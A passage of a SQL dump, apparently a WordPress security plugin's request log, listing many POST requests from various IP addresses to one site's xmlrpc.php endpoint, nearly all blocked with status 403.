Safari\\/537.36\"}','jUHgtqlPVnZT7WoaIsBXvN1F',0,1679939374.0716,613,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','H7eR4tEYlFvBAmynpG0afqNi',0,1679939375.0509,619,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','gDWf1mONIA0LPBZ7CRcxT8qM',0,1679939385.9844,632,'','POST',403,0,515,0,1,'',0),('1.117.83.240',24466416,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','XnfFUA9dLyqKTHkhJwOujlZQ',0,1679939393.3735,1489,'','POST',403,0,515,0,1,'',0),('202.44.8.48',3391883312,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','o4NvP62mk8XxeRg1flLTtyzQ',0,1679939392.9533,2196,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','iDTQfpoNM2mBZguznvr7P308',0,1679939409.3192,722,'','POST',403,0,515,0,1,'',0),('62.210.185.4',1053997316,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','jqE1FLtdiJfN9rVkSU2nevmH',0,1679939410.0413,599,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','FR51HnbG3V2ilkEh6jONeQIX',0,1679939429.4855,563,'','POST',403,0,515,0,1,'',0),('64.225.22.79',1088493135,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','IrSEaYgH59tlD6CvP4wj3fNy',0,1679939452.8632,591,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','XsV3EDRwgM84yrJvL5I9H0q2',0,1679942442.7255,2032,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','dEIpQnKNM9TFXc7Vs6Lmfx1Y',0,1679942443.5432,2219,'','POST',403,0,515,0,1,'',0),('167.71.226.185',2806506169,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','mHAEyLn03VsJNuWcR2ldaUQX',0,1679942444.1619,1965,'','POST',403,0,515,0,1,'',0),('107.180.77.81',1806978385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','v7oONn26U0i4JkSlFzE9QxGc',0,1679942454.3566,576,'','POST',403,0,515,0,1,'',0),('216.250.113.146',3640291730,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ryhzSKjFCU7wINe8GHR02ZVY',0,1679942458.9887,580,'','POST',403,0,515,0,1,'',0),('95.163.104.122',1604544634,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','8Tndk7SHB46s2rPjiY1oeCIG',0,1679942465.7405,655,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','vC5cBi2elxXmSLYfoGawbRdZ',0,1679942472.3492,563,'','POST',403,0,515,0,1,'',0),('35.187.109.22',599485718,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','0F3XDLbQucEA2VplxSjioUnf',0,1679942480.8558,886,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','yws3mUJCuIh0MjqRxK25kN9d',0,1679942481.4721,1297,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','FgUXNoliRr3zAn7mwKY04QOa',0,1679942481.9432,1082,'','POST',403,0,515,0,1,'',0),('123.30.238.182',2065624758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','BR0DgvknWrj3dyFUhXfpZS9K',0,1679942492.9994,625,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','rOqEvpc4RylbgQGX0iotIMeB',0,1679948026.0067,2734,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','YfJUA9BPsknGyeNrCdQMq0bw',0,1679948030.2797,602,'','POST',403,0,515,0,1,'',0),('89.46.106.145',1496214161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','McWeGXdzQDyKBk7LlACJsj3t',0,1679948044.6579,546,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','A7aiKvmnqH4JPEwzpy13sYFN',0,1679948048.2886,654,'','POST',403,0,515,0,1,'',0),('185.182.57.16',3115727120,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','84wdoul9DLW3MnVvGZpFaHP0',0,1679948049.1392,795,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','12QqFPh8IyvpDOCn9NizjksE',0,1679948056.5673,1275,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','nDU61teFvIKmMsi3EqkjYfJx',0,1679948056.4618,1382,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','vQgIiOrn3h6JTZYLx5N2PVDB',0,1679948061.5060,596,'','POST',403,0,515,0,1,'',0),('159.223.77.48',2682211632,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','N1JYDjtXknuQ93TFvr8ig0h2',0,1679952442.4551,3809,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','xQB0ZljK4VmHaU8tACEvLSob',0,1679952442.3681,4705,'','POST',403,0,515,0,1,'',0),('198.71.230.31',3326600735,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','BeDkF1cIGSjqxwAp5hmW0JO2',0,1679952448.3468,543,'','POST',403,0,515,0,1,'',0),('114.132.219.217',1921309657,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','BvbrGhq50NHlyn9Ox7u2YoUc',0,1679952454.2128,605,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','UB7rx19aiXwHGZSjt3DM5zCb',0,1679952456.1575,885,'','POST',403,0,515,0,1,'',0),('103.68.251.115',1732574067,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','hrkFpzs4DY8EWxNbOAHG7aZC',0,1679952456.6761,842,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','WINR18yatOXqAe6sh7vzbSKP',0,1679952462.5379,559,'','POST',403,0,515,0,1,'',0),('34.172.150.73',581736009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','a3mVwt1oExrP0I2RGsB8jUeF',0,1679952463.5535,550,'','POST',403,0,515,0,1,'',0),('95.170.72.254',1604995326,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','FBO0DXpxYnicqE98rt4PZWf7',0,1679955316.3635,1369,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','tuTYjno58WVEqCsLcKSJMFrO',0,1679955315.7928,2062,'','POST',403,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','7OPiDkQrJ8HXBhu0ERqgGSZ1',0,1679955320.8997,557,'','POST',403,0,515,0,1,'',0),('68.65.123.34',1145142050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','QMkNfvwLsqdS1iuln6mPyac7',0,1679955326.2986,583,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','Tp8RjGSxUZbEm6hi9ct5swA1',0,1679955343.6999,649,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','0oPMUSh8lFjdRgftQVXKbBvu',0,1679955344.8004,547,'','POST',403,0,515,0,1,'',0),('66.29.132.64',1109230656,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','yj1iCPkaSDbQ59H43z8MNYFX',0,1679955349.3385,600,'','POST',403,0,515,0,1,'',0),('167.71.226.185',2806506169,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','XsAHBbIJqloVKGNQgc95LwiM',0,1679961827.5472,3775,'','POST',403,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','MLCawoK9srE5YyqkUj6iQge3',0,1679961830.7876,1041,'','POST',403,0,515,0,1,'',0),('43.154.142.51',731549235,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','ZRfxX2SpqOAKm7etcWTa1swV',0,1679961839.8589,586,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','J2n09YaBKFPAem1UIi5MlxgQ',0,1679961843.7264,667,'','POST',403,0,515,0,1,'',0),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','xAfw0OzZFokKgImeXVRrb3an',0,1679961858.3943,624,'','POST',403,0,515,0,1,'',0),('185.232.250.88',3119053400,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','80NZT4OcY1FILqV7x6iCKUtP',0,1679961864.8060,563,'','POST',403,0,515,0,1,'',0),('2.58.82.244',37376756,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','HGZS0wVteu5NvBr7aAli8LfX',0,1679961870.4403,1148,'','POST',403,0,515,0,1,'',0),('107.180.77.81',1806978385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','rCUlZXEVcjNfLbGRk1hQOP7i',0,1679961871.0617,1516,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','iXDgzUFoaE4m5pKtNRGPAxSl',0,1679961871.9887,1082,'','POST',403,0,515,0,1,'',0),('94.40.87.204',1579702220,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','JN2AkRLl6UsznD8xPSh5yTGa',0,1679965330.7601,2240,'','POST',403,0,515,0,1,'',0),('193.141.65.220',3247260124,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','CQKFRyIfUHqXrZj5wBiA74Yc',0,1679965340.0992,1951,'','POST',403,0,515,0,1,'',0),('49.234.102.159',837445279,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','gL3kjA6xyDwnKcNCmYFbSW4p',0,1679965354.9662,1202,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','feCEzlZLuqOdbxa6nGv5BXtp',0,1679965355.3575,1093,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','OGlqK0rDkvWg5haVjPn7iCtE',0,1679965364.7423,542,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','oahglfYXsMtu09jHCRKwz1J6',0,1679965366.1023,556,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','niOD1L3tpZvAklRE297TFdgh',0,1679965370.4131,539,'','POST',403,0,515,0,1,'',0),('5.189.162.27',96313883,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','yq3o89eIZSTOV4MPUhrlg2xG',0,1679965374.4111,478,'','POST',404,0,515,0,1,'',0),('89.46.105.179',1496213939,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','tnCYvMVDI9AGpKrswfoSgQlx',0,1679965375.8732,571,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','DznljEGAWyXYuJTmqId918Bo',0,1679965379.1012,587,'','POST',403,0,515,0,1,'',0),('43.154.142.51',731549235,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','R8ftwqzkvLCAyg7H2Qjupcen',0,1679965383.1094,607,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','6FoK0f7vwrH14cLnQXmIMNGb',0,1679969785.0798,2978,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','fk4KxvmCUTWleZHF1aurR5ct',0,1679969786.8531,1537,'','POST',403,0,515,0,1,'',0),('68.178.145.9',1152553225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','3o12aqsOt7d4IxeCZfiDGHQw',0,1679969795.6398,593,'','POST',403,0,515,0,1,'',0),('96.231.235.203',1625811915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','A8L42IUbVJ3Dtzj1c0WFxTNM',0,1679969805.0538,998,'','POST',403,0,515,0,1,'',0),('54.38.45.49',908471601,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','C2VuyjhdmkSpA5IxQwR6rgao',0,1679969805.8581,1510,'','POST',403,0,515,0,1,'',0),('54.195.75.99',918768483,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','TmJvjRpUhkeGaIoZrtPbfC4q',0,1679969805.9443,1450,'','POST',403,0,515,0,1,'',0),('89.163.140.92',1503890524,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','xESfNuZ0Wd5XcA7vy8h2aUjF',0,1679969814.2281,553,'','POST',403,0,515,0,1,'',0),('185.61.153.77',3107821901,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ixoufmIJOUCbKGNqzXRF26Pp',0,1679969818.6977,2357,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','CT4dXbAD3f9RELSlp0yhsPug',0,1679969819.9548,1622,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','hxo6l8UMXfYEF7qk24cBT0S3',0,1679969820.7409,1156,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','wgMUWcTeSd9kZyGVtDF4hnAp',0,1679969825.7209,565,'','POST',403,0,515,0,1,'',0),('63.250.38.213',1073358549,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','84kiDWQI06TMcSYUmt1O7Zyf',0,1679974147.7806,2189,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ol1abcJ3HRhQ25TtdKs9rngU',0,1679974154.4518,551,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','aHStZx4jOv0lqdhwzMp6cKXQ',0,1679974168.7653,556,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','21tNYQlWDLu4vIRmG9cHP8nC',0,1679974174.3243,561,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','Ge5hLfWT1xKBsMj3rulniEbR',0,1679974182.2872,662,'','POST',403,0,515,0,1,'',0),('192.138.189.25',3230317849,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','FzrsbtIRaYeZf87W6NnQ9dOS',0,1679974182.9949,690,'','POST',403,0,515,0,1,'',0),('208.109.40.232',3496814824,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','DVxCby1O4GaqelR2Fopvgduh',0,1679974184.8089,574,'','POST',403,0,515,0,1,'',0),('47.94.233.98',794749282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ZEyPfRsSxTOkW2izhYJNlrQ9',0,1679974208.3287,1497,'','POST',403,0,515,0,1,'',0),('68.178.145.9',1152553225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','xvSW8aARf6D1hQr43uUGzkLZ',0,1679978565.0407,1756,'','POST',403,0,515,0,1,'',0),('74.208.59.155',1255160731,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','7f8SbgWLqKraP0U5jEYZtRQv',0,1679978566.8580,673,'','POST',403,0,515,0,1,'',0),('202.61.232.172',3393054892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','IYAN1jUpZfv3SC9VRndXcPqO',0,1679978570.0818,775,'','POST',403,0,515,0,1,'',0),('35.185.76.79',599346255,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 